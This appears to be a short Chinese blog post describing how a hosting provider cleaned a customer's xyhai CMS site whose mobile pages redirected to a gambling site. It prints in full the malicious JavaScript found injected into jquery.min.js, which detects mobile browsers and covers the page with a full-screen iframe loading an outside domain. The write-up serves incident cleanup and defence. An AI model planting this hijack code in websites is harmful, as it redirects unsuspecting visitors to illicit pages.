某用户使用的xyhai行云海CMS原本是在阿里云云服里搭建的，手机端被挂黑链导致调转到黑彩页面。无法自行处理，因此转移到我们这边的同时让处理一下。

首先针对PHP源码查了一下，没有异常，那很可能是JS代码挟持了。搜索了一下 终于在   /Public/Home/default/js/jquery.min.js 里找到恶意片段。

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?8c2329bf3b7dca93314fdf50fbbc09cf";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

//除了上面的统计代码，以下为恶意劫持代码

var url = ['https://600tk-okgs-411.087mn8r61c.cc'];

var MobielUrl = url[Math.floor((Math.random()*url.length))];

function is_mobile() {

    var regex_match = /(nokia|iphone|android|motorola|^mot-|softbank|foma|docomo|kddi|up.browser|up.link|htc|dopod|blazer|netfront|helio|hosin|huawei|novarra|CoolPad|webos|techfaith|palmsource|blackberry|alcatel|amoi|ktouch|nexian|samsung|^sam-|s[cg]h|^lge|ericsson|philips|sagem|wellcom|bunjalloo|maui|symbian|smartphone|midp|wap|phone|windows ce|iemobile|^spice|^bird|^zte-|longcos|pantech|gionee|^sie-|portalmmm|jigs browser|hiptop|^benq|haier|^lct|operas*mobi|opera*mini|320x320|240x320|176x220)/i;

    var u = navigator.userAgent;

    if (null == u) {
        return true;
    }
    var result = regex_match.exec(u);
    if (null == result) {
        return false
    } else {
        return true
    }

}

if (is_mobile()) {

    document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
    document.write('<style>html,body{widht:100%;height:100%;overflow:hidden; clear:both;}</style>');
    document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;">');
    document.write('<if'+'rame src="'+MobielUrl+' " frameborder="0" style="border:0;width: 100%; text-align: center; background: #f2f2f2; border: medium none; height:100%;max-height: 4000px;">'+'</iframe>');
    document.write('</div>');

}

将恶意代码删除之后保存，网站终于恢复正常。